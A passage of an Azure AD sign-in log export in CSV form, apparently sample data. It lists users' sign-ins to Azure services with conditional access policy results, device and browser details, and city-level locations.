'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfcca72f-40c4-4044-85c7-4ddd44051a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,dfcca72f-40c4-4044-85c7-4ddd44051a00,SigninLogs,Sucess,33.0175209,35.44601059
+1837,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:13.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2172edcc-dabe-4e42-b165-431d385e885a,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",7ad10e9e-8b94-4b07-9307-1c32f7741700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,7ad10e9e-8b94-4b07-9307-1c32f7741700,SigninLogs,Sucess,41.90428925,-85.99833679
+1838,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:13.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2172edcc-dabe-4e42-b165-431d385e885a,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",7ad10e9e-8b94-4b07-9307-1c32f7741700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,7ad10e9e-8b94-4b07-9307-1c32f7741700,SigninLogs,Sucess,41.90428925,-85.99833679
+1839,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c3f05bee-816e-464d-bf4e-b9912f0cf9a8,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",a90d7024-2f24-4b85-b726-7a30730b1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,a90d7024-2f24-4b85-b726-7a30730b1800,SigninLogs,Sucess,36.6404686,-78.26995087
+1840,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:37.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 18:33,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",861b8654-7b14-4e8e-a4d0-4baded654c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,861b8654-7b14-4e8e-a4d0-4baded654c00,SigninLogs,Sucess,35.01296997,-80.93171692
+1841,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:38.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:53,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c5b94689-796f-4b24-973f-d9d352f32300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c5b94689-796f-4b24-973f-d9d352f32300,SigninLogs,Sucess,32.0840416,34.88776016
+1842,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:23.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",24b904d7-063a-4f4c-9637-40c752ef0300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,24b904d7-063a-4f4c-9637-40c752ef0300,SigninLogs,Sucess,33.0175209,35.44601059
+1843,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:11.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3109113e-8f92-47c2-a124-2483dad20200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3109113e-8f92-47c2-a124-2483dad20200,SigninLogs,Sucess,33.0175209,35.44601059
+1844,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:11.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 